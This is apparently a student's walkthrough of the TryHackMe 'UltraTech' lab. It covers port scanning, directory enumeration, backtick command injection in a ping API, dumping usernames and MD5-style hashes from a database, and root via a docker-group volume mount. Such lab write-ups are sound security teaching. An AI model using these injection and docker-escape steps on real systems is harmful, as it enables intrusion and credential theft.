TryHackMe | UltraTech

A TryHackMe room that involves the basics of penetration testing, enumeration, privilege escalation and webapp testing.

Ultratech

Tasks

  • Identify software on ports.

Vulnerabilities

  • The API is not secure: it passes user input to a shell. The service account should also follow least privilege (membership in the docker group is equivalent to root).

Nmap

Discovered open port 21/tcp on 10.10.112.55 vsftpd 3.0.3
Discovered open port 22/tcp on 10.10.112.55 OpenSSH 7.6p1
Discovered open port 8081/tcp on 10.10.112.55 Node.js
Discovered open port 31331/tcp on 10.10.122.55 Apache

I used the -v flag to print open ports as they were found.

Gobuster

  • Navigate to the Apache web server on port 31331 and enumerate it with gobuster.
/images        (Status: 301) [Size: 322]
/index.html    (Status: 200) [Size: 6092]
/javascript    (Status: 301) [Size: 326]
/js            (Status: 301) [Size: 318]
/partners.html (Status: 200) [Size: 1986]
/robots.txt    (Status: 200) [Size: 53]
/server-status (Status: 403) [Size: 303]
/what.html     (Status: 200) [Size: 2534]

Foothold

  • We can navigate to the login page at /partners.html; the API behind it on port 8081 exposes a ping endpoint:
http://10.10.112.55:8081/ping?ip=10.10.112.55
  • Tinkering a bit with the ip value shows it is handed to a shell unsanitised: backticks are evaluated, giving command execution on the host.
10.10.112.55:8081/ping?ip=`ls`
ping: utech.db.sqlite: Name or service not known
  • Let's cat out the credentials in utech.db.sqlite the same way. The database holds two users and their hashes:
r00t  f357a0c52799563c7c7b76c1e7543a32
admin 0d0ea5111e3c1def594c1684e3b9be84
  • hashid reports them as an MD-family digest (32 hex characters, consistent with MD5).

Privesc

  • User is not able to run sudo
r00t@ultratech-prod: sudo -l
Sorry, user r00t may not run sudo on this machine.
  • Use linpeas to enumerate.
uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)
  • We are part of the docker group, so check GTFOBins for an entry. It gives:
./docker run -v /:/mnt --rm -it alpine chroot /mnt sh
  • Alpine is the image in that entry, but there isn't one locally, so list what already exists on the machine (docker ps -a); the old containers show a bash image is available.
CONTAINER ID   IMAGE   COMMAND                  CREATED       STATUS                     PORTS   NAMES
7beaaeecd784   bash    "docker-entrypoint.s…"   2 years ago   Exited (130) 2 years ago           unruffled_shockley
696fb9b45ae5   bash    "docker-entrypoint.s…"   2 years ago   Exited (127) 2 years ago           boring_varahamihira
9811859c4c5c   bash    "docker-entrypoint.s…"   2 years ago   Exited (127) 2 years ago           boring_volhard
  • Now run the GTFOBins command with the bash image instead:
docker run -v /:/mnt --rm -it bash chroot /mnt sh
  • And now we are root: the host filesystem is mounted at /mnt and chroot drops us into it as uid 0.

Student that loves FOSS